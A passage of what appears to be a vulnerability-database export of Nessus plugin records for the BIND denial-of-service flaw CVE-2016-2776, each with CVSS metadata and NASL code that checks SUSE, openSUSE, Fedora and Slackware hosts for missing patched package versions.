script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", 
reference:\"bind-devel-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T12:29:15", "description": "The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362) This update was imported from the\nSUSE:SLE-12-SP1:Update update project.", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "openSUSE Security Update : bind (openSUSE-2016-1133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind-debugsource", "p-cpe:/a:novell:opensuse:bind-chrootenv", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bind-lwresd", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind-utils-debuginfo", "p-cpe:/a:novell:opensuse:bind"], "id": "OPENSUSE-2016-1133.NASL", "href": 
"https://www.tenable.com/plugins/nessus/93782", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1133.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93782);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"openSUSE Security Update : bind (openSUSE-2016-1133)\");\n script_summary(english:\"Check for the openSUSE-2016-1133 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. 
(CVE-2016-2776, bsc#1000362) This update was imported from the\nSUSE:SLE-12-SP1:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000362\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-chrootenv-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debugsource-9.9.6P1-2.22.1\") ) flag++;\nif 
( rpm_check(release:\"SUSE13.2\", reference:\"bind-devel-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-chrootenv-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-debugsource-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-devel-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-libs-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-libs-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-lwresd-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-lwresd-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-utils-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-utils-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.9P1-39.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.9P1-39.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-debuginfo / bind-debugsource / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:49", "description": "Update to the latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-06T00:00:00", "title": "Fedora 24 : bind99 (2016-cca77daf70)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-06T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:24", "p-cpe:/a:fedoraproject:fedora:bind99"], "id": "FEDORA_2016-CCA77DAF70.NASL", "href": "https://www.tenable.com/plugins/nessus/93888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-cca77daf70.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93888);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-cca77daf70\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 24 : bind99 
(2016-cca77daf70)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-cca77daf70\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind99 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bind99-9.9.9-2.P3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind99\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:24", "description": "Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing 
additional issues.", "edition": 18, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 25 : 32:bind (2016-76bd94ca9e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-11-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:32:bind"], "id": "FEDORA_2016-76BD94CA9E.NASL", "href": "https://www.tenable.com/plugins/nessus/94821", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-76bd94ca9e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94821);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-76bd94ca9e\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 25 : 32:bind (2016-76bd94ca9e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-76bd94ca9e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 32:bind package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:32:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"bind-9.10.4-2.P3.fc25\", epoch:\"32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"32:bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:55", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.", "edition": 25, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bind (SSA:2016-271-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-271-01.NASL", "href": "https://www.tenable.com/plugins/nessus/93742", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-271-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93742);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"SSA\", value:\"2016-271-01\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bind (SSA:2016-271-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.568983\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eab11c62\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n 